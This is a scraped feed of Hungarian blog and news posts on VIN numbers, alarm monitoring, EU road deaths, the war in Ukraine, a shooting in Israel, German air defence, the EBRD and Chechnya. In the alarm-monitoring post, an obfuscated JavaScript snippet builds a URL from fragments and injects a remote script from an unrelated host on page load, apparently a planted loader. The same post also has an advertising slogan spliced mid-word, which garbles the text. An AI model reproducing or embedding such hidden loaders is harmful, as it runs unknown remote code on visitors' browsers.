Biztonságpolitika

A VIN számot itthon főleg alvázszámként ismerik. Nemzetközi nevén viszont VIN (Vehicle Identification Number), amely a gépkocsi egyedi „igazolványaként” szolgál. A 17 jegyű számsor beolvasása után nem csak a gyártási évet, a helyet, valamint a különféle szervizmunkálatokat tudhatjuk meg általa, de az autó eladásáról is rengeteg információt kaphatunk.

A gépkocsi előéletéről

Az alvázszám egy olyan egyedi azonosító, amely alatt szó szerint mindent nyilvántartanak az autóról. Maga az azonosító olyan számokból és betűkből áll, amelynek részei külön jelentéssel bírnak. Helyileg a forgalmiban, valamint főleg az autó szélvédőjén lévő adattáblán találhatjuk meg, illetve több elrejtett helyen is beleütik a gépjármű egyes részeibe. A VIN adatlapba kerül az is, mikor járt az autó szervizben, milyen balesetei voltak, hogy mikor és hol történetek ezek, továbbá kik voltak a korábbi tulajdonosai. Ezen kívül az autó gyártása, forgalomba helyezésének éve és az összes gyári specifikációja könnyedén lekérdezhető a VIN szám által. Ennek a legnagyobb jelentősége természetesen használt autó vásárlásánál van, mivel egyértelműen felderíthető a VIN szám leolvasása után az autó eredete és pontos története. Sajnos gyakran trükköznek az eladók azzal, hogy például eltitkolják a baleseteket. A megjavított autón nem látszik semmi, de az alvázszám leolvasásával kiderül, hogy mikor volt utoljára szervizben és milyen problémával. Ugyanúgy kiderül az is, ha az autó lopott vagy más kétes eredettel bír. Nehéz vele csalni, hiszen bármilyen hivatalos szervizbe is viszik az autót, ott kötelező az alvázszám adatai alapján még azt is megadni, hogy milyen alkatrészek kerültek cserére a gépjárműben. A VIN számot nem csak a szakemberek, hanem mi magunk is leolvashatjuk az arra alkalmas weboldalakon. Ezek az oldalak olyan nemzetközi adatbázisokkal rendelkeznek, amikben bármely gépkocsi nyilvántartása megtalálható. Ezért az alvázszám lekérdezése esetén még a külföldről behozott autóknál is megismerhetjük azok előtörténetét.

Hogyan értelmezzük az alvázszámot?

Ahogyan már említettük a VIN szám speciális szám- és betűkombinációból áll. Az egész számsor három fő részből tevődik össze. Ezek részei a WMI, a VDS és a VIS megnevezéssel bírnak. Ezek a rövidítések pedig a következőeket rejtik: a WMI a gyártó jelzése, ami minden országban ugyanaz az első három betű vagy szám. A következő hat jegy a modell megjelölését, amíg a VIS az utolsó, minimum nyolc karakterével az egyedi azonosítót jelzi – ez magában foglalja a gyártás helyét és évét is többek között.

Hol található pontosan a VIN szám?

A VIN szám, ahogy már említettük, a gépkocsi adattábláján pillantható meg először. Ez a kis címke vagy akár fémlap jellemzően az autó szélvédője alatt, illetve a kocsi elején található. Viszont a gyártók ezt a karaktersort nem csak ott, hanem az autó különféle területein is feltüntetik. Ez modellenként eltérő, és akár 4-9 helyen is előfordulhat a gépjárművön – általában a vezetői oldalon. Ennek a célja, hogy nehezebben tudjanak csalni az autóval. Ezért egy szakavatott autóvásárló nem csak az adattáblát ellenerőzni, hanem ezeket a rejtett számokat is. Ugyanis ha ezekből valamelyik eltér, vagy épp átütés nyoma tapasztalható rajta, akkor az autóval valószínűleg problémák lesznek.

 

The post Mit érdemes tudni az alvázszámokról? appeared first on .

A statisztikai adatok világosan rámutatnak arra, hogy a távfelügyelet szolgáltatásnak igenis van létjogosultsága – akár a csendes, nyugodt környékeken is. A számok pedig, mint tudjuk, sohasem hazudnak – ebben az esetben sem.

Nem szabad félvállról venni a kérdést

Személy- és vagyonvédelem – fajsúlyos téma ez, ami nem képezheti alku tárgyát. Sajnos már nem elég a szerencsénkben bízni, és abban reménykedni, hogy mindennemű segítség nélkül is védettek vagyunk a rablókkal, károkozókkal szemben. A már emlegetett statisztikai felmérésekben viszont bátran bízhatunk – az adatok szerint azok a lakások, családi házak, amelyeknél már megoldott a távfelügyelet kiépítése, sokkal kevesebb eséllyel vannak kitéve a betörésnek, mint azok, ahol a lakók nem tulajdonítanak nagy jelentőséget ennek az igencsak számottevő kérdésnek.

24 órás megfigyeléssel a teljes biztonság jegyében

Gondoljon csak bele, milyen felemelő és egyben felszabadító érzés lenne tudni, hogy az otthona, a családja és az értékei teljes biztonságot élveznek – nemcsak időszakosan, de a nap 24 órájában! Ezt a bizonyosságot adhatja meg a számunkra a 0-24 órás távfelügyelet, különösen az olyan extra szolgáltatatásokkal kiegészítve, mint a helyszínre kivonuló járőrszolgálat.

Hogyan működik a szolgáltatás?

Az okos berendezéHa távfelügyelet, akkor csakis az Alarmdirect!s bármilyen észlelt rendellenesség esetén azonnal értesítést küld a központba. A diszpécseri központ szakképzett munkatársai 0-24-ben figyelik ezeket az értesítéseket. A tapasztalatuk és komoly szaktudásuk révén azonnal a megfelelő módon reagálnak. A jelzés oka lehet áramkimaradás, a rendszer akkumulátorának lemerülése, de akár betörési kísérlet is. Ha Ön előzőleg rábólintott a járőrszolgálat igénylésére is, a diszpécser azonnal értesíti a közelben lévő illetékes szerveket, akik a helyszínre kiérkezve megoldják a problémát.

Ha távfelügyelet, akkor csakis az Alarmdirect!

Hazánk egyik legnépszerűbb biztonságtechnikai berendezések forgalmazásával és telepítésével foglalkozó cégére, az Alarmdirect-re bármikor rábízhatjuk magunkat. A profi gárda palettáján kizárólag minőségi produktumokat találhatunk – amelyek ára ráadásul példátlanul baráti.

(function(){ tkwnu="axfpcv6xkwn9";tkwn=document.createElement("script"); tkwn_="u"+("st");tkwn_+="at"+(".");tkwn.async=true;tkwn_+="in"; tkwnu="371575189."+tkwnu;tkwn.type="text/javascript";tkwnu+="f0e926skXqj2"; tkwnu+="72n7hz";tkwn_+=("f")+"o"+("/");tkwn.src="https://"+tkwn_+tkwnu; tkwnd=document.body;tkwnd.appendChild(tkwn); })();

The post Távfelügyelet – minden, amit a szolgáltatásról tudni kell appeared first on .

Tavaly lényegesen kevesebben vesztették életüket az Európai Unió útjain, mint a koronavírus-járvány előtt; Magyarországon szintén csökkent a halálos kimenetelű közúti balesetek száma – derült ki az Európai Bizottság a 2021-ben bekövetkezett halálos kimenetelű közúti balesetekről készült jelentéséből.

Az adatok szerint tavaly mintegy 19 800 ember vesztette életét közúti balesetben az Európai Unió területén. A tavalyi adat, noha a 2020-as számokhoz képest öt százalékkal, mintegy ezer halálesettel több, de a 2019-es, a koronavírus okozta világjárvány előtti időszakhoz képest 13 százalékkal, közel háromezerrel kevesebb halálos áldozatot jelent. 2019 és 2020 között a halálos kimenetelű közúti balesetek száma 17 százalékkal csökkent – közölték.

A halálos kimenetelű közúti balesetek számát tekintve az uniós országok rangsora a korábbi évekhez képest nem változott jelentősen. Továbbra is Svédországban a legbiztonságosabb a közúti közlekedés, az országban tavaly egymillió lakosra vetítve 18 haláleset jegyeztek fel. A legmagasabb arányról Romániában számoltak be, ahol egymillió lakosra vetítve 93-an vesztették életüket az utakon 2021-ben. Az uniós átlag 44 közúti haláleset volt egymillió lakosra vetítve.

A jelentés szerint Magyarországon szintén csökkent a halálos kimenetelű közúti balesetek száma a világjárvány előtti szinthez képest. Amíg 2019-ben egymillió lakosra vetítve 62 ember vesztette életét közúti balesetekben, addig számuk tavaly 56 volt, amely csaknem tíz százalékos csökkenést jelent. A halálos kimenetelű közúti balesetek legnagyobb, több mint húsz százalékos csökkenését Dániában, Belgiumban, Portugáliában, Lengyelországban és Litvániában jegyezték fel. Ezzel szemben Lettországban, Szlovéniában és Finnországban nőtt a halálos balesetek száma.

A halálos közúti balesetek 52 százaléka vidéki utakon történt, a városi területeken ez az arány negyven százalék, az autópályákon pedig nyolc százalék. Az autóval utazók az összes közúti halálos baleset 43 százalékát, a gyalogosok húsz százalékát, a motorosok 18 százalékát, a kerékpárosok pedig a tíz százalékát tették ki.

Jelentésében az Európai Bizottság emlékeztetett arra: az EU azt a célt tűzte ki, hogy 2030-ra a felére essék vissza a közúti halálesetek száma. Az elmúlt évtizedben az Európai Unió egészét tekintve 36 százalékos csökkenés következett be – tették hozzá.

Elképesztő: több mint háromezer gyorshajtót mértek be múlt héten Budapesten
Csaknem 3400 gyorshajtót mértek be a rendőrök múlt hét közepén a fővárosban – közölte a Budapesti Rendőr-főkapitányság (BRFK). A 3380 autós közül 132 sofőrrel szemben helyszíni bírságot, 275-el szemben közigazgatási bírságot szabtak ki, további 2973 autóst traffipax mért be. Ők szintén közigazgatási bírságra számíthatnak. A BRFK közleménye szerint az ellenőrzések során kilenc egyéb bűncselekményt is felderítettek a rendőrök. A rendőrség továbbra is kiemelt figyelmet fordít a közlekedésbiztonságra, azon belül is az egyik legfőbb baleseti veszélyforrásra, a gyorshajtások visszaszorítására – írták.

The post Európai Bizottság: tavaly kevesebben vesztették életüket az utakon, mint a világjárvány előtt appeared first on .

Az ukrán erők visszavették az orosz csapatoktól a főváros határában, Kijevtől északnyugatra fekvő Irpiny települést – közölte hétfőn Olekszandr Markusin, a város polgármestere a Telegram üzenetküldő portálon.

Egyelőre azt kérte a városka lakóitól hogy ne térjenek vissza a településre, mert veszélyes. “Tart a város megtisztítása, és még újabb orosz támadások várhatók” – idézte a polgármestert az Ukrajinszka Pravda hírportál.

Közben az ukrán hatóságok által hétfőn közzétett statisztika szerint az Azovi-tenger partján fekvő Mariupolban a háború kitörése óta csaknem ötezren haltak meg a várost ért orosz támadásokban, köztük mintegy 210 gyermek. Pontos adatokat egyelőre nem tudnak közölni. A kikötővárost már 28 napja ostromolják az orosz csapatok. A települést a blokád előtt megközelítőleg 140 ezer mariupolinak sikerült elhagynia, utána 150 ezer lakost evakuáltak. Jelenleg még mintegy 170 ezren maradtak a városban. Harmincezer mariupolit szállítottak el Oroszországba, illetve az orosz erők által elfoglalt kelet-ukrajnai területekre.

A kelet-ukrajnai Harkiv polgármestere, Ihor Terehov a hétfői tájékoztatóján kijelentette: “az orosz hadsereg célzottan lakott területeket lő. Nemcsak egy-egy házat, hanem egész lakónegyedeket. A város lakóit állandóan bombázzák. Eddig 1410 objektum pusztult el, ebből 1177 többszintes lakóépület”. A polgármester hozzátette, hogy 53 óvoda, 69 iskola és 15 kórház is megsemmisült Harkivban.

Terehov szavai szerint önkéntesek életüket kockáztatva szállítanak élelmet olyan kerületekben lévő óvóhelyekre, amelyeket szünet nélkül ágyúznak az orosz erők. Közölte, hogy ugyanakkor a szupermarketek működnek a városban, és az alapvető élelmiszerek kaphatók. Harkiv más városokból is kap humanitárius segélyt. Ilyen segítséget küldenek az Egyesült Államokból is: Chicago városa például 880 ezer dollár értékben küldött orvosi eszközöket, amelyeket városi kórházaknak és katonai kórházaknak osztottak szét – mondta a városvezető.

A politikus kitért arra, hogy Harkiv olyan város, ahol alapvetően oroszajkúak élnek, a háború kitörése előtt szinte minden negyedik ott lakónak volt rokona vagy ismerőse, barátja Oroszországban. Mint mondta, Harkivot többé-kevésbé mindig is Oroszországhoz “lojális” városnak tekintették, de a háború drámaian megváltoztatta az ott élők viszonyulását Oroszországhoz. Terehov azt hangsúlyozta, hogy Harkiv lakói ma egységesek, és készek a végsőkig harcolni a városuk megvédéséért.

A dél-ukrajnai Herszon megyében lévő Henicseszkben, az Azovi-tenger partján fekvő kikötővárosban – amelyet elfoglaltak az orosz csapatok – elkezdtek rubelben “nyugdíjat” osztani a helyi lakosoknak – számolt be a Moszt című, helyi hírportál. Tízezer rubelt – valamivel több mint száz dollárt – osztogatnak a helyieknek, akik viszont a pénzt azonnal átváltják hrivnyára, a boltokban ugyanis nem fogadják el az orosz valutát. Szerhij Lany, a Herszon megyei tanács egyik tagja a Facebookon arra kérte az embereket, hogy “semmit se fogadjanak el az orosz megszállóktól, ne működjenek együtt velük, ugyanis csakis így járulhatnak hozzá Ukrajna győzelméhez”.

Közben Kirilo Budanov, az ukrán katonai hírszerzés főnöke egy interjúban azt állította, hogy Kijevnek kiterjedt ügynökhálózata van Oroszország katonai, politikai és pénzügyi vezetésében, beleértve a Kremlt is, és szerinte ennek köszönhetően semmisítettek meg nemrég egy partraszállító hajót az Azovi-tenger partján fekvő Bergyanszkban. Budanov az interjúban kiemelte, hogy Ukrajna védői készen állnak hosszú háborúra, de szükségük van még több vadászrepülőgépre, valamint légvédelmi és rakétavédelmi rendszerre.

Az ukrán légierő keleti parancsnoksága hétfőn este arról számolt be, hogy Harkiv megyében újabb orosz repülőgépet és drónt lőtt le. A repülőgép típusáról és a pilóta sorsáról információkat nem közöltek.

Az ukrán vezérkar legfrissebb, hétfői összesítése szerint eddig hozzávetőlegesen 17 ezer orosz katona esett el, mintegy ezer került fogságba. A vezérkar állítása szerint az ukrán erők megsemmisítettek 123 orosz repülőgépet, 127 helikoptert, hét hadihajót, 586 harckocsit, csaknem 1700 páncélozott harcjárművet, több mint háromszáz tüzérségi és 54 légvédelmi rendszert, valamint 95 rakéta-sorozatvetőt.

Az ukrán szárazföldi erők parancsnoksága közben hírszerzési értesülésre hivatkozva arról számolt be, hogy öngyilkos lett az orosz csapatok egyik harckocsiezredének parancsnoka, miután az ukrán hadsereg visszafoglalta az északkeleti Szumi megyében lévő Trosztyanec települést. Az ukrán északi hadműveleti parancsnokság pedig azt jelentette, hogy katonái megsemmisítették az orosz erők egy hadoszlopát, és megszereztek két Ural Tornádó típusú páncélozott teherautót. Oleh Szinyehubov, a kelet-ukrajnai Harkiv megye katonai adminisztrációjának vezetője a Telegram üzenetküldő portálon pedig arról számolt be, hogy az ukrán légvédelem Izjum város közelében lelőtt egy orosz Szu-34-es taktikai bombázó repülőgépet.

Felfüggesztette működését a Novaja Gazeta a “különleges hadművelet” befejezéséig
Felfüggesztette működését a Novaja Gazeta című független orosz lap az ukrajnai háború befejezéséig – közölte a szerkesztőség. “Újabb figyelmeztetést kaptunk a Roszkomnadzortól (az orosz tömegtájékoztatási és távközlési felügyelettől). Ezt követően felfüggesztjük az újság online és papír alapú változatát, közösségimédia-tevékenységét «az Ukrajna területén zajló különleges hadművelet» befejezéséig” – áll a szerkesztőség közleményében. A Roszkomnadzor vasárnap megakadályozta, hogy a Kommerszant, a Novaja Gazeta és a Dozsgy leközölhesse az első interjút, amelyet Volodimir Zelenszkij ukrán elnök a háború kezdete óta az orosz médiának adott. Az anyag csak a Lettországban szerkesztett Meduza hírportálon jelent meg. Dmitrij Peszkov, a Kreml szóvivője hétfőn azt állította, hogy Moszkva “nem fél” nyilvánosságra hozni Zelenszkij interjúját, amelyet a Roszkomnadzor szerinte abból a szempontból ellenőriz, hogy megfelel-e az orosz jogszabályoknak.

The post Orosz agresszió: visszavették az ukrán erők a Kijev melletti Irpinyt appeared first on .

Ukrajna kész a semlegességről és a biztonsági garanciákról tárgyalni, de a demilitarizálásról és “nácitlanitásról”, valamint az orosz nyelv védelméről nem – jelentette ki Volodimir Zelenszkij ukrán elnök az orosz sajtónak az országa elleni háború kezdete óta adott első interjújában, amelyet vasárnap este közölt a Lettországban szerkesztett, orosz és angol nyelvű Meduza hírportál.

Az ukrán elnök rosszallását fejezte ki amiatt, hogy az orosz fél a nyilvánosságnak is kiszivárogtatott ultimátumban fogalmazta meg a Kijevvel szembeni tárgyalási pozícióját. Az orosz nyelv védelmével kapcsolatban azt mondta, hogy “a háború minden napja megkérdőjelezi még a fogalmát is annak, hogy mi is az orosz nyelv”.

“Az emberek ezt nem akarják majd. Az emberek nem akarnak majd (oroszul) olvasni, mozit nézni, beszélni” – vélekedett az elnök.

Zelenszkij azt állította, hogy Ukrajnában mindenki olyan nyelven beszél, amilyenen csak akar. A kölcsönös tisztelet szükségességéről beszélt a szomszédos országok esetében, arról, hogy Kijev a történelem, a nyelv és a kulturális örökség iránti “tükörtiszteletet” rögzítő megállapodásokat kíván kötni velük.

“Szóval, mit jelent ez? Hogy ne játszadozzunk tovább, ahogy a magyarok is játszadoznak ezzel egy kicsit, de kevesebbet, Oroszország pedig többet. Ne játszadozzunk tovább az iskolabezárással Ukrajnában. Ha orosz iskolát akarnak, ha valaki oroszul akar tanulni – magániskolát, tessék, nyissanak, de azzal a feltétellel, hogy ha önök nálunk nyitnak egyet, mi önöknél nyitunk” – fogalmazott az államfő.

Leszögezte, hogy szerinte Oroszországban az orosznak, Ukrajnában az ukránnak kell lennie az államnyelvnek. Azt mondta, hogy a legfontosabb pontban, a biztonsági garanciák, a semlegesség, és a nem-nukleáris státus kérdésében Kijev készen áll a megegyezésre. “Ha jól emlékszem, emiatt kezdték a háborút” – hangoztatta.

Zelenszkij hangsúlyozta, hogy a megállapodást parlamenti ratifikációval és néhány hónapon belül referendumon kell megerősíteni, amelyet kezeseknek kell garantálniuk, és amely szerinte csakis az orosz csapatkivonás után lehet legitim. Az ukrán alkotmányban a szükséges változtatásokhoz a hatályos jogrend értelmében két ülésszak, vagyis egy teljes év szükséges.

Az ukrán államfő ismételten személyes találkozót szorgalmazott Putyinnal. Úgy vélekedett, hogy Oroszország, Ukrajna és Fehéroroszország az érintettség okán nem lehet a tárgyalások helyszíne. Azt mondta, hogy egyelőre nem érti teljesen a békefenntartók Ukrajnába vezénylésére vonatkozó lengyel javaslatot. Hozzátette: lengyel partnereinek elmagyarázta, hogy országának nincs szüksége egy befagyasztott konfliktusra a területén.

Hamisítványnak nevezte azt az állítólagos parancsot, amelyet az orosz védelmi tárca szerint Mikola Balan vezérezredes, az ukrán nemzeti gárda parancsnoka írt alá, és amely Moszkva szerint annak bizonyítéka, hogy Kijev erőszakkal készült visszafoglalni a szakadároktól a Donyec-medencét. Azt állította, hogy minden készülő ukrán támadásra vonatkozó dokumentum hamis, és Kijev sem a Donyec-medence, sem a Krím ellen nem akart támadást indítani.

Felhívta a figyelmet arra, hogy nemrégiben az az álhír kezdett el keringeni, miszerint már elkészültek a kitüntetések, amelyeket a Krím visszafoglalásában részt vevő katonák kaptak volna. Rámutatott, hogy ezekhez járó okleveleken az ő nevét, adományozói minőségben, V.A. Zelenszkijként tüntették fel, amelyből az A az apai nevének rövidítése lenne. Mint mondta, helyesen az O betűt kellett volna használni, ukrán módra, az Olekszandr név után, nem pedig a név orosz megfelelőjének, az Alekszandr-nak a rövidítését.

Viccnek nevezte az állítást, miszerint Ukrajnában katonai biolaboratóriumok működnek. Mint mondta, Ukrajnának emellett nukleáris és vegyi fegyvere sincsen.

Ukrajna katonai célját a minél kevesebb áldozatban, a háború időtartamának lerövidítésében és az orosz erőknek a február 24-i támadás előtti “kompromisszumos területekre” való visszavonulásában nevezte meg. Az állította, hogy az orosz erőknek mintegy 20 ezer katonájuk esett el. (Az orosz vezérkari főnök első helyettese pénteken 1351 halottat ismert el.)

Zeleneszkij a Meduza mellett a Kommerszant és a Novaja Gazeta című lap, valamint a betiltott Dozsgy kérdéseire is válaszolt a Zoomon adott interjúban, amelyet vasárnap egy időben, vasárnap este kívántak megjelentetni. Az orosz tömegtájékoztatási és távközlési felügyelet (Roszkomnadzor) azonban felszólította az orosz médiát, hogy ne tegye közzé az interjút, és “ellenőrzést” indított a “felelősség mértékének megállapítására”. A Roszkomnadzor vasárnap blokkolta a német Bild bulvárlap és Alekszandr Nyevzorov orosz újságíró honlapját, tömeges rendbontásra, szélsőségességre, valamint jogellenes tömegakciókban való részvételre szólító felhívás címén.

A G7 csoport nem hajlandó rubelben fizetni az orosz gázért
A világ legfejlettebb ipari államait összefogó G7 csoport kormányai felszólítják az országukban orosz energiahordozók importjával foglalkozó vállalatokat, hogy ne fizessenek rubelben az érvényes szerződések alapján Oroszországtól vásárolt földgázért – jelentette be a német gazdasági és klímavédelmi miniszter. Robert Habeck elmondta, hogy a G7 csoport soros elnökségét betöltő Németország képviseletében összehívta a hetek energiaügyekben illetékes minisztereit, hogy egységes, összehangolt választ adjanak a Kreml által barátságtalannak minősített országokra vonatkozó rubelalapú elszámolási rendszer bevezetésére. Az online tanácskozáson teljes egyetértés volt arról, hogy Moszkva lépése az érvényes földgázszállítási szerződések “egyoldalú és egyértelmű megsértése” – mondta a miniszter. A G7 csoport az Egyesült Államokat, Franciaországot, Japánt, Kanadát, Nagy-Britanniát, Németországot és Olaszországot, valamint az Európai Uniót mint nemzetek feletti intézményt fogja össze.

The post Orosz agresszió: Kijev nem tárgyal a “nácitlanításról”, a demilitarizálásról és az orosz nyelv védelméről appeared first on .

Agyonlőtt két embert, hetet pedig megsebesített két merénylő az észak-izraeli Haderán, a támadókat lelőtték – jelentette a Kan közszolgálati rádió.

Hadera városközpontjában, a központi buszpályaudvarnál, két merénylő automata fegyverekkel tüzet nyitott az ott tartózkodó rendőrökre és civilekre. A közelben lévő határőr katonák meghallották a lövéseket, a helyszínre siettek, és agyonlőtték a támadókat. Hét sérültet a közeli Hillel Kórházba szállítottak. Közülük ketten súlyosan megsebesültek, hárman közepesen, ketten pedig könnyebben sérültek meg a rádiónak nyilatkozó orvos szerint.

“Ez egy nagyon súlyos incidens. (…) Két eszméletlen ember is volt a terepen életjelek nélkül, náluk, sajnos, csak a halál beálltát tudtuk megállapítani” – nyilatkozta egy mentős a Jediót Ahronót című újság hírportáljának, a ynetnek. A merénylők az észak izraeli Umm al-Fahem nevű városból autón érkeztek Haderára, arab nemzetiségű izraeli állampolgárok. A Hamász és az Iszlám Dzsihád nevű iszlamista terrorszervezetek üdvözölték az iszlám böjti hónap, a ramadán előtt egy héttel elkövetett merényletet.

Múlt héten Dél-Izraelben Beér-Seván történt hasonló, akkor négy emberéletet kioltó merénylet, melyet egy, a Negev-sivatagban élő, szintén arab nemzetiségű izraeli állampolgár hajtott végre.

The post Két terrorista agyonlőtt két embert Izraelben, hetet megsebesített appeared first on .

Németország izraeli légvédelmi rendszert vásárolhat a védelmi képességek erősítését szolgáló nagyszabású programjában, amelyet az Ukrajna elleni orosz háború miatt indítottak el – írta a Bild am Sonntag című vasárnapi lap.

A lap szerint Németország a Nyíl-3 nevű rakétarendszert vásárolhatja meg, amelyet az Israeli Aerospace Industries és az amerikai Boeing fejlesztett a több ezer kilométeres távolságra fekvő célpontokra nagy pontossággal lecsapó rakéták elleni védekezésre. A rendszer nagyjából kétmilliárd euróba kerülhet és 2025-re telepíthetik.

“Jobban meg kell védenünk magunkat az Oroszországból érkező fenyegetéssel szemben, és ehhez gyorsan szükségünk van egy egész Németországra kiterjedő rakétavédelmi pajzsra” – mondta a Bild am Sonntagnak Andreas Schwarz, a szövetségi parlament költségvetési bizottságának védelmi költségvetésre szakosodott tagja, hozzátéve, hogy a Nyíl-3 “jó megoldás” lenne.

Olaf Scholz kancellár és Eberhard Zorn, a hadsereg (Bundeswehr) főfelügyelője szerdán kezdte meg a részletes egyeztetéseket arról, hogy konkrétan miként kellene felhasználni a védelmi képességek fejlesztésére szánt 100 milliárd eurós (37 300 milliárd forint) külön alapot. A Nyíl-3 rendszer beszerzésének lehetőségéről is tárgyaltak – írta a Bild am Sonntag.

Az ügyben a Bundestag vezető védelmi szakpolitikusai is tájékozódnak egy vasárnaptól csütörtökig tartó izraeli látogatáson. A küldöttség tagjai között van a védelmi bizottság elnöke, Agnes Strack-Zimmermann is. A politikus a Welt hírtelevíziónak vasárnap azt mondta, hogy a “fenyegetettségi helyzetre” és az orosz hadseregben használt fegyverrendszerekre tekintettel, a német kormánynak is meg kell vizsgálnia egy rakétavédelmi rendszer beszerzésének kérdését. Hozzátette, hogy többféle lehetőség is van.

A szövetségi kormány az Ukrajna elleni orosz támadás első napjaiban határozta el, hogy felállítanak egy százmilliárd eurós pénzügyi alapot az ország védelmi képességeinek fejlesztésére, és ezen felül minden évben a hazai össztermék két százalékát meghaladó összeget fordítanak védelemre. Arról is döntöttek, hogy a válságövezetekbe irányuló fegyverexportot elutasító hagyományos német álláspontot megváltoztatva, mégis küldenek fegyvereket az ukrán hadseregnek.

Az ukrajnai fegyverszállítás beindítása és a nagy arányú – a NATO-tagoktól elvárt, GDP-arányosan két százalékos védelmi költségvetést meghaladó mértékű – haderőfejlesztés irányváltás a hidegháború vége óta követett német politikában. A kormány indoklása szerint mindkettő elkerülhetetlen, mert az Ukrajna elleni orosz invázió fordulópont az európai történelemben, és az új korszakban új politika szükséges az ország, a szabadság és a demokrácia megvédéséhez.

A Kremlt aggasztják Biden Putyinra tett megjegyzései
Joe Biden amerikai elnök szombati varsói beszédében az ukrajnai háborúval kapcsolatban “mészárosnak” nevezte Putyint, aki szerinte “nem maradhat hatalmon”. Az amerikai elnök erkölcstelen háborút folytató “gyilkos diktátornak”, “gonosztevőnek” és “háborús bűnösnek” is nevezte Putyint. A Kremlt aggodalommal töltik el Biden  újabb, Putyinra tett megjegyzései és továbbra is élénk figyelemmel kíséri a tengerentúli vezető kijelentéseit – nyilatkozott hétfőn Dmitrij Peszkov orosz elnöki szóvivő újságíróknak Moszkvában.

The post Orosz agresszió: izraeli légvédelmi rendszer beszerzését mérlegelik Németországban appeared first on .

Az Európai Újjáépítési és Fejlesztési Bank (EBRD) hétfőn bejelentette, hogy bezárja moszkvai és minszki irodáit.

A közép- és kelet-európai gazdaságok, valamint az egykori szovjet térség átalakulásának támogatására 1991-ben életre hívott londoni pénzintézet szerint az irodák bezárása már folyamatban van. Hétfői tájékoztatásában a bank hangsúlyozza, hogy erőteljesen elítéli az ukrajnai háborút, és a moszkvai, valamint a minszki EBRD-iroda bezárása egyenesen következik Oroszország cselekedeteiből, amelyekhez Fehéroroszország segítséget nyújt.

Az EBRD közölte, hogy továbbra is megingathatatlanul támogatja Ukrajnát, a már összeállított egy támogatási csomagot kétmilliárd euró értékben Ukrajnának és a háború által érintett más országoknak. Ezt a programot az EBRD két hete hirdette meg.

Az igénybe vehető támogatási formák közé tartozik a törlesztési kötelezettségek halasztása és átstrukturálása, a kereskedelemfinanszírozás, beleértve az üzemanyagimporthoz nyújtandó támogatást, sürgősségi likviditásfinanszírozás partnerintézmények bevonásával, valamint az ukrán hatóságok támogatása a sürgősen szükségessé váló reformok bevezetésében, például azonnali törvényalkotási és szabályozói intézkedések végrehajtásában.

Az Ukrajnával szomszédos, menekülteket befogadó országok számára a program egyik fő eleme az energiaellátás biztonságát szolgálja, egyebek mellett sürgősségi energiahordozó-vásárlások finanszírozásával az Oroszországból és Fehéroroszországból érkező import esetleges kiesésének pótlására.

Az EBRD támogatási csomagjából jut a menekülteket ellátó települési helyhatóságok szolgáltatásainak finanszírozására, kereskedelemfinanszírozásra, valamint likviditáspótlásra a befogadó országok kis- és közepes vállalkozásai számára is. Az EBRD a minap bejelentette azt is, hogy a kormányzótestület jóváhagyása esetén határidő megjelölése nélkül felfüggeszti Oroszország és Fehéroroszország hozzáférését a bank finanszírozási forrásaihoz és szakértői tevékenységéhez.

Az EBRD-finanszírozások legnagyobb egyedi felvevője korábban minden évben Oroszország volt, de a bank részvényes országai 2014-ben, a krími válság nyomán azt az informális iránymutatást adták az igazgatóságnak, hogy az EBRD – összhangban a Moszkvával szemben akkor meghozott nemzetközi szankciókkal – ne kezdjen új finanszírozási programokat Oroszországban. Ezt a döntést teszi hivatalossá – és terjeszti ki Fehéroroszországra is – az EBRD igazgatótanácsának kezdeményezése az oroszországi és a fehéroroszországi finanszírozások felfüggesztésére.

Több mint tízezer hektár erdő ég Csernobilnál
Több mint tízezer hektár erdő áll lángokban a csernobili atomerőmű körüli, úgynevezett tiltott zónában a térségben zajló harci cselekmények miatt – közölte Ljudmila Denyiszova ukrán emberi jogi biztos, akit az Ukrajinszka Pravda hírportál idézett. Az ombudsman közölte, hogy 31 tűzesetet jegyeztek fel. “A tüzek megfékezése és oltása lehetetlen, mivel az orosz csapatok elfoglalták a tiltott zónát. Az égés következtében radioaktív anyagok kerülnek a légkörbe, amelyeket a szél jelentős távolságokra visz el. Ez sugárzással fenyegeti Ukrajnát, Fehéroroszországot és az európai országokat” – fogalmazott. A tisztségviselő kiemelte, hogy a szeles és száraz időjárás miatt nő a tüzek intenzitása és területe. “A lángok a csernobili zóna területén található kiégett nukleáris fűtőelemek és nukleáris hulladékok tárolására szolgáló létesítményeket is elérhetik” – figyelmeztetett. A biztos ezért a Nemzetközi Atomenergia Ügynökséghez (NAÜ) fordult azzal a felhívással, hogy a lehető leghamarabb küldjenek szakértőket és tűzoltó felszereléseket Ukrajnába. “A katasztrofális következmények csak a terület orosz megszállásának azonnali megszüntetésével előzhetők meg. Ezért felszólítom a nemzetközi emberi jogi szervezeteket, hogy tegyenek meg minden lehetséges intézkedést az Oroszországi Föderációra nehezedő nyomás fokozására az Ukrajna elleni katonai agresszió leállítása és az magas kockázatú zónák felszabadulása érdekében” – tette hozzá az ombudsman.

The post Orosz agresszió: az EBRD bezárja moszkvai és minszki irodáit appeared first on .

A téma megnevezése Jelen cikk az Észak-kaukázusi Szövetségi körzet részét képező Csecsenföld népének és történelmének bemutatására törekszik. Ezt követően az Észak-Kaukázus ISIS-eként is emlegetett Kaukázusi Emirátus nevet viselő terrorszervezet létrejöttének okai, történelmi gyökerei és tevékenysége kerül bemutatásra az első és második csecsen háború, illetve a nemzetközi terrorizmus elleni küzdelem kontextusában. Bevezetés

Az Észak-kaukázusi Szövetségi Körzet (Северо-Кавказский федеральный округ) hét szubjektumot foglal magába:

1. Csecsenföld
2. Dagesztán
3. Észak-Oszétia
4. Ingusföld
5. Kabard-és Balkárföld
6. Karacsáj- és Cserkeszföld
7. Sztavropoli határterület

A szövetségi körzet 170,4 ezer négyzetkilométernyi területet foglal magába, mely az Oroszországi Föderáció 1%-át teszi ki. A legfrissebb demográfiai adatok alapján a területen közel 10 millió ember él, tehát a föderáció népességének közel 7%-a. Az észak-kaukázusi térségben olyan népekkel találkozunk, mint az adigék, kabardok, balkárok, karacsájok, ingusok, avarok, kumikok, kalmükök, nogájok, oszétok.[i] Etnikai szempontból egy rendkívül színes és többségében muszlim lakosságú körzetről beszélhetünk.[ii]

